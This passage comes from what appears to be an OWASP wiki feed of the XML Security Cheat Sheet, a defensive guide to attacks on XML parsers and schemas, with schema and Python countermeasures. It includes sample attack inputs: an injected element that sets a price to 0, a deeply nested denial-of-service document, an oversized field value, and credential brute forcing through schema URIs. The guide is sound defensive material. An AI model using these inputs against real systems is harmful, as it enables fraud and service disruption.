Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
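&lt;br /&gt;
The averaging step of the time-based approach can be sketched as follows. Only the analysis is shown; the measurements are made-up numbers, the function name &amp;lt;tt&amp;gt;classify_ports&amp;lt;/tt&amp;gt; and the threshold are hypothetical, and the assumption that slow responses indicate closed ports depends on the implementation being tested:&lt;br /&gt;

```python
from statistics import mean


def classify_ports(samples, threshold_seconds):
    """Label each port by comparing its mean response time with a threshold.

    Which side of the threshold means "open" depends on the implementation
    being probed; here slow responses are assumed to indicate closed ports.
    """
    result = {}
    for port, timings in samples.items():
        result[port] = 'closed' if mean(timings) > threshold_seconds else 'open'
    return result


# Hypothetical measurements in seconds, several per port.
samples = {
    80: [0.11, 0.09, 0.12, 0.10],
    8080: [0.95, 1.10, 1.02, 0.99],
}
print(classify_ports(samples, threshold_seconds=0.5))
```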
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the authority part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
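&lt;br /&gt;
From a defensive point of view, identifiers that carry credentials are easy to spot before they are resolved. The following sketch uses the standard library URL parser; the helper name &amp;lt;tt&amp;gt;has_embedded_credentials&amp;lt;/tt&amp;gt; is hypothetical, and where such a filter is applied is left to the application:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def has_embedded_credentials(uri):
    """Return True when the URI carries a username or password."""
    parts = urlsplit(uri)
    return parts.username is not None or parts.password is not None


parts = urlsplit('foo://username:password@example.com:8080/')
print(parts.username, parts.password, parts.hostname, parts.port)
print(has_embedded_credentials('foo://username:password@example.com:8080/'))  # True
print(has_embedded_credentials('https://example.com/note.dtd'))               # False
```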
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224435</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224435"/>
				<updated>2016-12-21T20:22:22Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, measure the time taken to process a regular XML document and compare it with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up (and eventually deplete) the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
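&lt;br /&gt;
The integrity check mentioned above can be as simple as comparing a digest of the schema file with a value recorded while the file was known to be good. This is a minimal sketch; the helper names &amp;lt;tt&amp;gt;sha256_of&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;schema_is_unchanged&amp;lt;/tt&amp;gt; and the file name &amp;lt;tt&amp;gt;note.xsd&amp;lt;/tt&amp;gt; are hypothetical, and where the pinned digest is stored is left open:&lt;br /&gt;

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """Return the hexadecimal SHA-256 digest of the file at path."""
    digest = hashlib.sha256()
    with open(path, 'rb') as handle:
        for chunk in iter(lambda: handle.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()


def schema_is_unchanged(path, expected_digest):
    """Compare the current digest of the schema with a pinned value."""
    return sha256_of(path) == expected_digest


with tempfile.TemporaryDirectory() as workdir:
    schema_path = os.path.join(workdir, 'note.xsd')   # stand-in schema file
    with open(schema_path, 'wb') as handle:
        handle.write(b'original schema')
    pinned = sha256_of(schema_path)   # recorded while the file is known good
    print(schema_is_unchanged(schema_path, pinned))   # True
    with open(schema_path, 'ab') as handle:
        handle.write(b' tampered')
    print(schema_is_unchanged(schema_path, pinned))   # False
```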
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
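&lt;br /&gt;
The effect of reading only the first value, and one way to detect the tampered structure, can be sketched as follows. The tree is rebuilt programmatically to mirror the tampered message, and the helper name &amp;lt;tt&amp;gt;duplicated_children&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET
from collections import Counter


def duplicated_children(element):
    """Return the sorted tag names that appear more than once under element."""
    counts = Counter(child.tag for child in element)
    return sorted(tag for tag, seen in counts.items() if seen > 1)


# Rebuild the tampered buy element from the text above without parsing input.
buy = ET.Element('buy')
for tag, text in [('id', '123'), ('price', '0'), ('id', ''), ('price', '10')]:
    ET.SubElement(buy, tag).text = text

print(duplicated_children(buy))   # ['id', 'price']
print(buy.findtext('price'))      # 0
```

A lookup that returns the first match picks up the bogus price of 0, which is why the structure should be validated against a schema before any value is read.&lt;br /&gt;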
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size of the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
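As a minimal sketch of what another schema language allows, the same document could be constrained with an XML Schema such as the following. The limits shown (256 characters for &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt;, at most three digits and a maximum of 150 for &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;) are illustrative assumptions, not values taken from the example above:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- Assumed limit: names longer than 256 characters are rejected --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- Assumed limit: bounds the numeric value --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;!-- Bounds the number of characters, since leading zeros do not change the value --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:pattern value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;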
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string and later restricting it to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and still considered the content valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions were only partially enforced for the element, which suggests that the information was tested by application code instead of being validated against the proposed sample schema.&lt;br /&gt;
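For the hexadecimal case mentioned at the start of this section, a minimal sketch could rely on the built-in &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; data type instead of a restricted string. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the length are hypothetical and only serve as an illustration:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:hexBinary'''&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;!-- For hexBinary the length is counted in octets: 16 octets are 32 hexadecimal digits --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;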
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logic flaw, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
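A minimal sketch of a stricter declaration for &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; follows. The upper bound of 1000 is an assumed business limit and not part of the original example:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;!-- Assumed limit: rejects unreasonably large orders --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:maxInclusive value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;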
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML schemas offer data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If the schema uses a data type that still admits zero, a denominator of zero may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used for values that should only ever be real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; set to Infinity or NaN will no longer reach the application, because these values are not valid for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type. If those values were allowed, an attacker could exploit the issue.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema may have these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
